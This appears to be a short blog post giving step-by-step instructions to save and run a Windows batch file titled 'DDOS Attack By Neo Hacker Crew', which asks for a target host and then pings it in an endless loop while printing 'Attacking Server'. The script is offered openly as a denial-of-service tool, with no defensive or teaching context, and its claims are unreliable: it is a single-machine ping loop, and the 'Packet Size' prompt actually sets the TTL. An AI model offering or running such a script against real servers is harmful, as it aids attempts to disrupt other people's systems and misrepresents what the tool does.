1. Open Notepad
2. Copy this code
@echo off
mode 67,16
title DDOS Attack By Neo Hacker Crew
color 0a
cls
echo.
echo DDOS By Fernando NeoPlaiz Azura Uzudami
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
3. Save as
4. Change "Text Document(*.txt)" with "All Files"
5. Change Save name with "DDOS Attack.bat"
Tidak ada komentar:
Posting Komentar